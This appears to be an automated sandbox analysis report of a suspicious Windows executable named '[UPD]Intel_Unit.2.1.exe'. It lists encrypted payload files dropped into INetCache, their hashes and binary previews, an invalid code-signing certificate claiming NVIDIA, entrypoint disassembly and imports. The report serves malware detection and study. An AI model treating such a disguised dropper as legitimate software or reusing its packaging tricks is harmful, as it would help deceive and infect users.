Preview:	....{..t..s......Y_^[.....f.H.f.H.\.H.a.H.'.H.A.H...H...H...H.k.H...H.'.H.'.H...H...H...H.U..E....SVW.}.3..X..~+...w..7....I.j.j.j.j.j.h..L.................;w........M...'...G..M.+.HP.F.PW.%...j.V...O....DpL.V.#...Y.M.;.u;..t..E.+...>...0.}.f;.}.u.......u...u.@....f;U......@...L.V....Y.M.;.u-..t#.E.+...>...0.}.f;.}.............u...tH...L.V...Y.M.;.........t#.E.+.E....0...f;........E.......u...........M..A..M...%...M..A........E.G..E..G..E.G..E....A.P.E.P......uA.G..PpL.V.E......Y.M.;.u*..t...+....0..>f;.uM......u...u..M..Y....M..$...._^[....f;U......@..........@.F....M..c$..2........@.U...,.E.SVW.@....p....d....V.3.u..]....E.B..E.B..E..B..E....F.....E..x..u..+....M..A..0....I....E...:../....~/.F.........../..;....E..@..../.........D...0.....u....H..D9.8\9.t..@8.@...........E..@..H..y..u,.M...'...U.M.._...u.V....I..M....M..X#.....F/..PV....I..M....E.9........E..@..@..x..u;jA.M.......M..v'...U.M..I_...u.V....I..M....M..."...E.9.u78].t.V....I....H..D9.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lovers

Download File

Process:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
File Type:	data
Category:	dropped
Size (bytes):	36456
Entropy (8bit):	7.995216907218738
Encrypted:	true
SSDEEP:	768:J4iIW3815tD3yWEQPK5PbaX4cHO3E6k6pVvJL2YFOletE8RFcx2d+mIcRCP5:J4C38hD3yW7eeX24y/FNtE8RFcx2eHP5
MD5:	275BB06E411E18B2F2413C99F90B273C
SHA1:	B0B56521A5DF919287999A6367C9E9DB452E15DA
SHA-256:	FCCAE85D1B45A4A6F6A9BCB369FA7C8A012DC2FCC3E6AD2D93BDDDFF527EBB6F
SHA-512:	89936CDDE69A00F5501DB3CCDA1C1A80933E5B36FA60A103BF33C9F6AEEB8D0CE5EF329BE445898AB2C5C7C0863909B855B5F913F07D9EB838B8BA71C87B3E71
Malicious:	false
Preview:	...<cM.0....P.6...A..d.X./.G\|}...N.>....._.3...[..q.1..2+5.+.j1K..&+...6.c.x<.t..mZ'..((#.GX.......5........m....O....O....{.-k...aj.h/..AuH.g...N.....E....7..+......o....H.....X..z2.F.R..........LZO....~i..;....fR................Z.@<d..^...Q..[...R...I4..!X..?..Sz.kTv7..b......ag.d..&.K.{.....7W......h.L..8....j'p...J..#..R...!.....\.J....-<f..$.s.......=.(...J..)..b.~.N'.\Z2$.S~oO.b.-..P1.....C.a.A./.........@.z..^.aX7~u%...C,+...pW.~...#eX9]..`F..n.k..4.69.d..akZO...9~g.s..v(..\t..M...Gg....@f..H.+W...>g#8.......:.^...k#....U..W.....R!.....c[.D.}..:.\.......{$C.....3....h...52By..k.a...:.."..xBT,....q6...VLU...T.#........z.3.[..........^0.4.Y...?.q.1LaZ.8..];...m.....".RP9.ch<o....KJP.ez...K0......gi..I..v.. .....V+.7:k^...[.._/..Va....7..<.....Uk ...Ex....C..+q~.K.G/~...3N$.R,T..ypdN$..In...i.q..Z...G..?..S.qC...!......3Y.o.........R'.d.B...M_.B.....I.pNc.LD.@.y....)...M...(.^p."......`p..9Ot=5.r......_.....I...z...DLw..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pg

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	140288
Entropy (8bit):	6.67958710669291
Encrypted:	false
SSDEEP:	3072:KCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmt:KCOMVIPPL/sZ7HS3zcNPj0nEo30
MD5:	2B437132A55BFA02A968B7176F510E8A
SHA1:	8FD9C04CBFD4B66DADD61A4095FB488D3672F76E
SHA-256:	B31778D643869E67EEFB497906F92BD0605EC0CA0EA0B658D5DFAF99445AD506
SHA-512:	4B9DC69684AFB7F49A5F300692763E8164798E3BED7E14329CE36EFBB65642A00EA83CD2CC26606A472A6B5DA265CA5273FFE8FF7C06C842229503AA1935C476
Malicious:	false
Preview:	........L..........y.I..A.....E.,K.......K.... cL....t.....E.tz3.;F\|.......~X............_..........y............L..........y.I..A.....E.,K.......K.... cL....................H.......E...........f;...q....FD.....E...a.........Y................;............Fh..................j..........f;...z.....FD......k.........c...;........Q....V..N\|..t%.E..}.;.sSW.F.PQ.M.............d....5.V....+.E.;.w#f..f;F4u......A....E.f.@.f;F6..0....}.E........t=.F\|.M....;.u-.~..u'.~..u!f..f;F4u..Fh...........~...i...}.E..N\|;...=T......E.........;.......f.......f#......f;........E.......E.;F\|...S.........E..]..D....E.;F\|...S.........}....E.t0..%....=....u".E.............%............E...........5....FD...........#....E.;F\|..qS.........}....E.t0..%....=....u".E.............%............E................FD...............E.;F\|...S.........}....E.t0..%....=....u".E.............%............E..........._....FD......H....M....E.;F\|...R.........}....E.t0..%....=....u".E.............%............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Robert

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	5.831454437971605
Encrypted:	false
SSDEEP:	1536:Fh6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPG:Lq8QLeAg0Fuz08XvBNbjaAtsPG
MD5:	5E91D4FD817D0861A7A01118369251C4
SHA1:	48C4A668B72C583F8A98E98485135E04CB63BD35
SHA-256:	C4397DEEFB0CFDDB5C71F93FA5D993B698C88D10C1AA9B550FACE439F09E6A0E
SHA-512:	80883D353DC41838AE9F054DDA5BD15604361802E3A1C7EF516356C689E3CC6248C47E0F04C1FF9F7DE9D3DC92FFE0B3E9739FADB3249599122C307CAB6B2C90
Malicious:	false
Preview:	E.N...I.N.I.D.E.L.E.T.E...T.C.P.A.C.C.E.P.T...H.O.T.K.E.Y.S.E.T...T.I.M.E.R.I.N.I.T...S.P.L.A.S.H.O.F.F...W.I.N.F.L.A.S.H.....F.I.L.E.M.O.V.E.....I.S.S.T.R.I.N.G.....O.B.J.E.V.E.N.T.....D.L.L.C.L.O.S.E.....I.N.I.W.R.I.T.E.....I.S.B.I.N.A.R.Y.....B.I.T.S.H.I.F.T.....W.I.N.C.L.O.S.E.....R.E.G.W.R.I.T.E.....I.N.P.U.T.B.O.X.....I.S.N.U.M.B.E.R.....S.H.U.T.D.O.W.N.....F.U.N.C.N.A.M.E.....F.I.L.E.O.P.E.N.....F.I.L.E.C.O.P.Y.....I.N.E.T.R.E.A.D.....S.E.T.E.R.R.O.R.....F.I.L.E.R.E.A.D.....C.E.I.L.I.N.G...W.I.N.M.O.V.E...R.U.N.W.A.I.T...T.O.O.L.T.I.P...W.I.N.K.I.L.L...D.I.R.C.O.P.Y...U.D.P.O.P.E.N...U.D.P.S.E.N.D...R.E.G.R.E.A.D...I.N.I.R.E.A.D...I.S.A.R.R.A.Y...W.I.N.W.A.I.T...T.C.P.R.E.C.V...O.B.J.N.A.M.E...D.L.L.O.P.E.N...E.X.E.C.U.T.E...I.S.F.L.O.A.T...D.L.L.C.A.L.L...U.D.P.R.E.C.V...W.I.N.L.I.S.T...I.S.A.D.M.I.N...C.L.I.P.G.E.T...I.N.E.T.G.E.T...U.D.P.B.I.N.D...D.I.R.M.O.V.E...C.L.I.P.P.U.T...S.R.A.N.D.O.M...M.O.U.S.E.U.P...M.A.P.K.E.Y.S...T.C.P.S.E.N.D...T.R.A.Y.T.I.P...R.A.N.D.O.M.....C.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sanyo

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	146432
Entropy (8bit):	6.700973790130753
Encrypted:	false
SSDEEP:	3072:gcBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80Pi:gcB3gBmmLsiS+SAhClbfP
MD5:	81A88E12D802C5BC732E0CFEA18F022F
SHA1:	3B1671DF94E6C36429DB33CC5D127F2DA509A43B
SHA-256:	8ED1351B297F6AE561D8CBCB860470BF4CDA8E9C77CBBAE1DD9EC2B5151AE86B
SHA-512:	CE507ECDE5BA3BD54C9B1FC87C78FD0F876DF74B5045E73C420A883638301270511DBCA8135933EEDE367636ABBEFB9845CA54EA78BDCED75C57C0F0F3AEBDFC
Malicious:	false
Preview:	....E...@.E..E.P...j.P.]...........u.8E.....E...-u.....E.....+u..u...F.]..u....u...t....ux..,0<.w.......#..,a<.w..........,A<.w.............t...u=j._.8..F.E..u.<xt.<Xt...u.j._.u..M.......u.....u.j._..F.]..u.3......U.U..E..K...w.......#..,a<.w..........,A<.w..............t0;.s,.E....].;.r.u.;M.v............E..F.]..u...u..M..U..G....]....u..E.3.E..A.u.VS....YY..t(......."......u.........t..................t....}..^.. ....E..P...........U.....M.SW.......t#.E.j._..t/;.\|...$~&.............3.U...t..M..._..[..].V.u..M.......E.3..u..E....E...0..j.V.E..L...YY..u.3.8]....f..-u.....f..+u..}...7....}....}..M..E.....j0Xj.Z..t.;.......f;...U...j:Xf;.s.....0.=........f;........`...f;...&......f;.s....-`.............f;..........f;.s....-..........f...f;..........f;.s....-f.............f;..........f;.s....-.........f...f;..........f;.s....-f............f;...w......f;.s....-.....]....f...f;...T......f;.s....-f....:....f...f;...1......f;.s....-f.............f;..........f;.s....-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Selection

Download File

Process:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997637591269226
Encrypted:	true
SSDEEP:	1536:ipnvhkt/rkMrRhuVfHYTGTMKJUpzRsYUlJSZR9L/I2Zty4ECd5Hsu8eFEjfS:ipn2kwuVgTycXUlEZTXy4b84FEDS
MD5:	779EBB32A40C9A64396EACD3CBDD721C
SHA1:	DEB9EBDC964BC43CE160EDF0E3808A18E3CC89ED
SHA-256:	BBC2D48F751A6FCBE3A19470BE69D77DA346F4C87E38A0421FD4CE941CA592DE
SHA-512:	68EB848D8A2DBE411062B2B99A2896BFD67F4915C3E38DFF2D2B62CCF9E41FA15906D3170DF586AEC52FAEE4C81E1D6537FC95EC961CF4A7BECFF43C7D59FF01
Malicious:	false
Preview:	.....2.M.>.k.Y.%...S..f:.\|.../)^.l.,..eu..d.L..}.Q....H..[(<Ff.Ar...u..l.J.sn.....~...$.~..=9.....V..K....PH\?.d..`.13......:.o....y...._.2.>.^..a>...PA.T.x...g.......e....].3..&.:4.P7.E.S..jt...n..4...}T&.....cS.r.......iyZ.G@'.n.....h....U..d.(z..I......=[...VF.....Q[.....4...s$.......\\1~.YY.;.iSB...6s....C..14.........8.oa...C.1,b..K...T....'%.y._Qy...........Kp.....v....H<u...J.'.#..S..DdGK.!S...K..d.6\.Yr..............[.mU8&....o......k...WK.D5.A.B..F..t3....W...4.{..,.....O..S..,..".........'.......bZ..$Q.TjIc.`.....I#.Q.O(..-9.L..WHn..t.Q.0.W=.o..r.........#k.a.M#.ITx..=..!^...C....H.?.........%..3....@....]..p.Jy.....T.FR...,.Bw.Y...W.$q0....I..G.G..:.....A~.....K...\|..Le.NZ.....t..~....`0.Fk..2.AwiR.$....G@.@.. ..?......r....Y(0.m.......z.....K....B.yQj.3..d....+(x$Ki=:.tM......~5C{..V.........m.].........0~g!.o.f.p."...E....#..s..R..$@....vg}S.>`.....P...DF&.8.....A.Tq'..C.H.+p..y......k....~...c.L. .Q.QT.not...PX....^q6W.s,~..kK

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Smart

Download File

Process:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.997870250617184
Encrypted:	true
SSDEEP:	1536:TtJo1vMTZggzPic9/l7vS4IozlbdXICpARnuIt0syQnp4EB:rUMTugzPTD75D7X7mnuIaPi4EB
MD5:	7BB1C7168444847E64B8D52A19D526A4
SHA1:	B0577E3414D38F3A036895E78D0A8BEB186622DD
SHA-256:	8259D660879A9A28012B0D7F4D1A360B8BCFBBCC01CBCD308E04455C5E2766D7
SHA-512:	70A54AB94335AECF6C6F77A9C2ABF8E27131D43D981EC6656B4A5522444A1EF548C968002E3B663C6799E180F07142D4C8DBB33D35427FFD3307839F05234045
Malicious:	false
Preview:	\|@q...Pew...."\|f.....E..XD..N.N....kN.R.M=z.5...Ng..b.....<.8.k...m.~.\.Y{...F.f/"...8....\|.......#......'U..ES.-.Ra MW.1.5N4...P..0.m...\..%7....@l.~.+.`.P..&..#..>.R..O2&,...[Rr.z$..C`.[.-..1.....&)....P<..6.h.X.@....n..g..H..-R.1..>.m..-p.....ba#..#.F..y\|....2..Z\G.....F...c........^..$.....$..Ry............g.7J=o.$?.........]..a.!O..>.l.....>......9a..#T....o.r5T..#...../....`-..X).0..h.a`.g.[ F.R..>....:.!./.E.r>uA...5..v.5{>.H.9.g.......".Z$..[5_...o_q...=...Cqb"/.?..(Y....,B.3.4..!m.....nG.k.+..5[=.t.1..Pi...D.{....y......L...Z.).`I....N.f`~.!......'X.bT........e.B'.t...u}r...^..3..L,/....)y.Kj...(. a....r........N.n.g.....;..X...#.....e......w....}W...G....;.m.EFp..t.....x.P. .r./i..d......M"....6+q[8.X...R^'....)..<.{....rp.9@b.qS'kId.K..lI...f.H.....;....5..a`B@..6...E...u.i.sN........$Kl~b.r...p...$....`[..-q....\|.......M...w.T...\.N.H..it......<..B.{....?..WMl$....F...X...Q...f..59....H........`..}%e.3.g.{.N

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Steps

Download File

Process:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
File Type:	data
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	7.996513432203169
Encrypted:	true
SSDEEP:	1536:LfGuf2wH08DxVkEPQkFUZi+JpJR8gfRzTVvr6avC:lf29uQ0+iIJugft5DrC
MD5:	0DD5041D2A616872A113D55B19C45A1E
SHA1:	B60405E4CDDF57920B0EF1929AC47043A1101C2A
SHA-256:	2257296BA16A378E02D68D82FF9BD280F3AD173E013248D9369CE08F4F900094
SHA-512:	A8A3F2EE5140103BC7E49C3D1ABC838C921CEC0616FE13E199DBBD807F73BB839067FB11901D37B5C7EDBD2464E94F4BADA81B036BEA3357979DD7AABBAE13DA
Malicious:	false
Preview:	H[.R....(..0......A&..HA.Io.G..#....:...E....}...M..#v..}...[..u.v...I&l...i...2.....5....>9..b8....;.3.9.."y5.=..B,.......M+.d..t.0.HL....}.-.>.5....L.-.\..z.%GR.7m3..Su"..-...3......,F...xi.4.a...L..`.`M#]j.).=T.X.....H......~.2.'...%3Vd........}.......z!z.Mx.......K.U)W6.....G....._..<...Jr... ......k ..._...7...d.5.[<G.lD..i. )...$.2;.~I.J."..q..:.ti#..}x.._.2/...kC.M..T.....Z...=Kvn.lN..Rn.U...p.hr8.......$K.K.r.%Y...8.5.66.....gT....-.m.c3...dm>.^.H..Pc..x.zM.f(6..\i.n.$.w.~@....;..T.O...Bl.....s.Y....Sk...F`e...j.U..\|..`.w...O9....e=!/V......[.g..l...S...{3~..@?....{.8.8....t.7._..+s7......E..T.>A..b&N.fq.F.....5..K.P.2......B.....,....<..;..R.H.H5K..gi..0......zh.B[...l=.'8IMS<d9..G...I.+M..S@....P..h..Tq..d....7Q..9p....PZ....o....z`....?.3.&.h..Y....^{f..%4.eg.3]5u.Y.A...l...6h........O.1......"..UuKHf..s...c5.k..XI[.2.....(.....T.!E!.X#...>....S....L._A...h&.#B"V[s...,.....<E..5.i....jA.q.Y...... ..l.U2.`1..%.._.C\|..i..y..9...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Suse

Download File

Process:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997145120935144
Encrypted:	true
SSDEEP:	1536:IupSQ5m5cgNG/V8cr5O6FE4VDC0FUvZVLzG:xSQ5m5jG/VRr06FE4xCtvZZC
MD5:	CAC74FA897B87E72256E7D176DE38B23
SHA1:	7EC04D342ADE1E868751C07C01BDFD93216BC87E
SHA-256:	6B6D3F0088A0BFCB9652FDF848AD15CB8E0303DE35DDF1F90517991EEC557571
SHA-512:	D1B7AEAEA71163C5922ED90F0ECAB266299F77BFDF0B4A73042123DF5565BAC425628FEDC552180A083872D74B5A1676423F10B8C90140EBE228F430557CBEFA
Malicious:	false
Preview:	_.A]...c...S#.L..-....d$d..Swm..`L.s@d.^!.$..9....js......R....&8.Z.....<.d..BR..3k.v...h..4a..).....1#...\|...ET]....n./5..$.Z..5x.7.0..Ax....iZ....?w}....L..y^}......1Yc.(...ql.........kI9...O..h{....&...1R..+rh.<.m........^;O.1..... ./.....+qMea...4.LIhpK.I'...}.\..4.FF.hzT.{.. ......R.T..@.!..C....."..b..'......HBE..^$...=.\|.....Do{...s.....=...u..u...!........%/..Y.,.@...S.R.....6..\|.....W..H.......l.~...5d.J..:.9R..z..J....9...I..]O..a.T....a...K.M..........envn.y..)....B,.vN..&U..l)hE...(......$...eV]..Q.......Y..5.....m.w...a.^S..0.h..k...A..N.y.y...T.H.(N.....y+L.n+rj..."...!=......^...[.... -R>.......3.............^.....a..<. .....h.H...6..,V....IM.A<.../.YbHK..Kb.,T...4...1%D....Ys>\|.e...aj..N.Od...=..~O..........3.\|{Y.tWE-R=O:...X.C5...5...\....W....B.\......@L.x?"q.9. ..?...(ie.8...$...b;...7c.....:..]6CA.g.yB-....W..j.df..%....L ..P.....t+.H.....V..2.1NU....L$..W6.q_'&Tvs..]......P3g~.....Y......%...eG....y.....{..7?.4S.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ware

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	dBase III DBT, version number 0, next free block index 16896, 1st item "SVW\213}\010\203\310\377\203e\010"
Category:	dropped
Size (bytes):	149504
Entropy (8bit):	6.43114886038352
Encrypted:	false
SSDEEP:	3072:AZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:AK5vPeDkjGgQaE/loUDtf0aD
MD5:	C7024F7EBC1135660D5A31BD4D90182D
SHA1:	79CC0BA360E6FCFA44B1D963B677A3B9F1520929
SHA-256:	68A96DF5C94374A988EA3D1222A7931EB24565FB78EA6832D5A6BDC993095EC9
SHA-512:	FCC61387E7DFD07D90E64978126C7CFBD573DCEDA02ACEFB8770D3033345E69928F6DB34C72E55547EC4A24547A8655487EEA93E912D2E59AAFD2AFFD5B74955
Malicious:	false
Preview:	.B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3....................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.976263398890355
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	[UPD]Intel_Unit.2.1.exe
File size:	1'119'746 bytes
MD5:	25b4bac0866214df0bcb32a8dc280555
SHA1:	58513411b725c0f264013acacaba7fe069208aa7
SHA256:	17e8ebdf1c3303f6c9538e9998e533962aa732a1356434d6cf78ab353f3a9f06
SHA512:	4f63a60288d8e15eb01843d1ecc61344606a4e3bf0933cf8bd02892dbb7d2167b7b35d4ff17c5207b25057520d7147bfa4bed38d75b6429f0c9ebe6458de592d
SSDEEP:	24576:setHGMwy9WuUSPl/hw6z89q1zfaaJ+1DPVhPQLc3nVQMd:j7zMU+0pJQ9hPQcQu
TLSH:	6F35230507680071FDAB4F72147985096DB7F808B073DEAFE36C884DBBB1BA15B6A275
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n...R...B...8.....

File Icon


Icon Hash:	f0f8f8e0c2d2c00a

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F34A0BE7C5Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F34A0BE793Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F34A0BE792Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F34A0BE522Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F34A0BE7601h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F34A0BE52B3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F34A0BE522Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x8dfe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x10efda	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x8dfe	0x8e00	cfada53c1c6680a8bb890acdce7bed8f	False	0.8463358274647887	data	7.334910285042412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfd000	0xf32	0x1000	d035e2aaf2ca623d94a572821f95b139	False	0.599853515625	data	5.512137549495014	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41c0	0x605f	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0003648007782417
RT_ICON	0xfa220	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.4945077298616762
RT_DIALOG	0xfc888	0x100	data	English	United States	0.5234375
RT_DIALOG	0xfc988	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xfcaa4	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xfcb04	0x22	data	English	United States	0.9705882352941176
RT_MANIFEST	0xfcb28	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
